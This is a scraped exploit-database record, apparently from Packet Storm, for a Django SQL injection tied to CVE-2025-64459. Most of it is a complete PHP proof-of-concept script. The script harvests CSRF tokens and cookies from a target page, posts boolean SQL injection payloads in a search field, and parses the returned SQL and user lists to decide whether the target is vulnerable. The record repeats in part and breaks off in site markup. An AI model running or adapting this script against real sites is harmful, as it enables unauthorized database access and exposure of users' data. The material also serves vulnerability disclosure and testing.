{“lastseen”:”2025-12-08T16:29:34″,”description”:”Django version 5.1.13 remote SQL injection vulnerability scanning script…”,”published”:”2025-12-08T00:00:00″,”modified”:”2025-12-08T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Django 5.1.13 SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:212537″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-64459″],”sourceData”:”=============================================================================================================================================\\n | # Title : Django 5.1.13 SQL Injection Scanner |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : https:\/\/www.djangoproject.com\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/212430\/ \\u0026\\tCVE-2025-64459\\n \\n [+] Summary : This PHP Proof\u2011of\u2011Concept is designed to detect and verify SQL Injection vulnerability in Django applications affected by CVE\u20112025\u201164459.The script performs the following actions:\\n \\n Sends both GET and POST requests to the target endpoint.\\n \\n Extracts CSRF tokens and cookies automatically.\\n \\n Injects multiple test payloads to compare against a safe baseline.\\n \\n Collects and parses the resulting SQL statements and returned user data.\\n \\n Compares baseline vs exploit responses to identify SQL injection behavior.\\n \\n Produces a concise analysis report indicating whether the endpoint is vulnerable.\\n \\n [+] POC : \\n \\n \\u003c?php\\n \/**\\n * by Indoushka\\n *\/\\n \\n error_reporting(E_ALL);\\n ini_set(\\”display_errors\\”, 1);\\n \\n define(\\”DEFAULT_BASELINE\\”, \\”AND\\”);\\n $DEFAULT_PAYLOADS = [\\”OR 1=1 OR\\”, \\”AND 1=0 AND\\”, \\”OR ‘a’=’a’ OR\\”];\\n \\n \/*———————————————————\\n HTTP GET\\n ———————————————————*\/\\n function http_get($url) {\\n $c = curl_init();\\n curl_setopt_array($c, [\\n CURLOPT_URL =\\u003e $url,\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_FOLLOWLOCATION =\\u003e true,\\n CURLOPT_HEADER =\\u003e true,\\n ]);\\n $r = curl_exec($c);\\n curl_close($c);\\n return $r;\\n }\\n \\n \/*———————————————————\\n HTTP POST\\n ———————————————————*\/\\n function http_post($url, $data, $cookies) {\\n $c = curl_init();\\n curl_setopt_array($c, [\\n CURLOPT_URL =\\u003e $url,\\n CURLOPT_POST =\\u003e true,\\n CURLOPT_POSTFIELDS =\\u003e $data,\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_FOLLOWLOCATION =\\u003e true,\\n CURLOPT_COOKIE =\\u003e $cookies,\\n ]);\\n $r = curl_exec($c);\\n curl_close($c);\\n return $r;\\n }\\n \\n \/*———————————————————\\n Extract SQL + User List\\n ———————————————————*\/\\n function extract_sql_and_users($html) {\\n $sql = null;\\n $users = [];\\n \\n if (preg_match(\\”\/\\u003cpre\\u003e(.*?)\\u003c\\\\\/pre\\u003e\/si\\”, $html, $m))\\n $sql = trim($m[1]);\\n \\n preg_match_all(\\”\/\\u003cli\\u003e(.*?)\\u003c\\\\\/li\\u003e\/si\\”, $html, $m2);\\n foreach ($m2[1] as $u) {\\n $u = trim(strip_tags($u));\\n if ($u !== \\”\\”) $users[] = $u;\\n }\\n \\n return [$sql, $users];\\n }\\n \\n \/*———————————————————\\n Send CSRF Payload\\n ———————————————————*\/\\n function send_payload($url, $payload, $verbose=false) {\\n if ($verbose)\\n echo \\”[*] Fetching CSRF…\\\\n\\”;\\n \\n \/\/ GET\\n $resp = http_get($url);\\n if (!preg_match(‘\/name=\\”csrfmiddlewaretoken\\” value=\\”([^\\”]+)\/’, $resp, $m))\\n die(\\”[!] CSRF Not Found\\\\n\\”);\\n $csrf = $m[1];\\n \\n if ($verbose)\\n echo \\”[i] CSRF token: \\” . substr($csrf, 0, 10) . \\”…\\\\n\\”;\\n \\n preg_match_all(‘\/Set-Cookie: ([^;]+)\/’, $resp, $cm);\\n $cookies = implode(\\”; \\”, $cm[1]);\\n \\n \/\/ POST\\n $post = [\\n \\”csrfmiddlewaretoken\\” =\\u003e $csrf,\\n \\”search\\” =\\u003e $payload\\n ];\\n $resp2 = http_post($url, $post, $cookies);\\n \\n return extract_sql_and_users($resp2);\\n }\\n \\n \/*———————————————————\\n Analysis\\n ———————————————————*\/\\n function analyze($bSql, $bUsers, $eSql, $eUsers) {\\n echo \\”\\\\n— Analysis —\\\\n\\”;\\n if ($bSql !== $eSql || $bUsers !== $eUsers) {\\n echo \\”[!] Possible SQL Injection Detected!\\\\n\\”;\\n } else {\\n echo \\”[-] No injection detected.\\\\n\\”;\\n }\\n }\\n \\n \/*———————————————————\\n Baseline Test\\n ———————————————————*\/\\n function run_baseline($url, $baseline, $verbose) {\\n echo \\”[*] Running baseline…\\\\n\\”;\\n return send_payload($url, $baseline, $verbose);\\n }\\n \\n \/*———————————————————\\n Single Test\\n ———————————————————*\/\\n function run_exploit($url, $payload, $baseline, $verbose) {\\n list($bSql, $bUsers) = $baseline;\\n echo \\”\\\\n[*] Payload: {$payload}\\\\n\\”;\\n list($eSql, $eUsers) = send_payload($url, $payload, $verbose);\\n echo \\”Baseline SQL: \\” . ($bSql ?? \\”None\\”) . \\”\\\\n\\”;\\n echo \\”Exploit SQL: \\” . ($eSql ?? \\”None\\”) . \\”\\\\n\\”;\\n analyze($bSql, $bUsers, $eSql, $eUsers);\\n }\\n \\n \/*———————————————————\\n Multi Payload Mode\\n ———————————————————*\/\\n function run_multi($url, $baseline, $payloads, $verbose) {\\n foreach ($payloads as $p)\\n run_exploit($url, $p, $baseline, $verbose);\\n }\\n \\n \/*———————————————————\\n Full Check Mode\\n ———————————————————*\/\\n function run_check($url, $baseline, $verbose) {\\n global $DEFAULT_PAYLOADS;\\n list($bSql, $bUsers) = $baseline;\\n $vuln = false;\\n \\n foreach ($DEFAULT_PAYLOADS as $p) {\\n list($eSql, $eUsers) = send_payload($url, $p, $verbose);\\n \\n if ($bSql !== $eSql || $bUsers !== $eUsers) {\\n echo \\”[+] Payload {$p} =\\u003e SQL Injection Likely!\\\\n\\”;\\n $vuln = true;\\n }\\n }\\n echo $vuln ? \\”\\\\n[+] Target VULNERABLE\\\\n\\” : \\”\\\\n[-] Target SAFE\\\\n\\”;\\n }\\n \\n \/*———————————————————\\n MAIN\\n ———————————————————*\/\\n if ($argc \\u003c 3) {\\n echo \\”Usage:\\n php scanner.php baseline http:\/\/127.0.0.1:8000\/\\n php scanner.php exploit http:\/\/target\/ \\\\\\”OR 1=1 OR\\\\\\”\\n php scanner.php multi http:\/\/target\/\\n php scanner.php check http:\/\/target\/\\n \\”;\\n exit;\\n }\\n \\n $mode = strtolower($argv[1]);\\n $url = rtrim($argv[2], \\”\/\\”) . \\”\/\\”;\\n $verbose = true;\\n \\n $baseline = run_baseline($url, DEFAULT_BASELINE, $verbose);\\n \\n switch ($mode) {\\n case \\”baseline\\”:\\n break;\\n case \\”exploit\\”:\\n run_exploit($url, $argv[3], $baseline, $verbose);\\n break;\\n case \\”multi\\”:\\n global $DEFAULT_PAYLOADS;\\n run_multi($url, $baseline, $DEFAULT_PAYLOADS, $verbose);\\n break;\\n case \\”check\\”:\\n run_check($url, $baseline, $verbose);\\n break;\\n default:\\n echo \\”Mode Error!\\\\n\\”;\\n }\\n \\n \\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212537″,”cvss”:{“score”:9.1,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212537\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-08T16:29:34″,”description”:”Django version 5.1.13 remote SQL injection vulnerability scanning script…”,”published”:”2025-12-08T00:00:00″,”modified”:”2025-12-08T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Django 5.1.13 SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:212537″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-64459″],”sourceData”:”=============================================================================================================================================\\n | # Title : Django 5.1.13 SQL Injection Scanner |\\n | #…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,10,12,13,53,7,11,5],"class_list":["post-29330","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-91","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n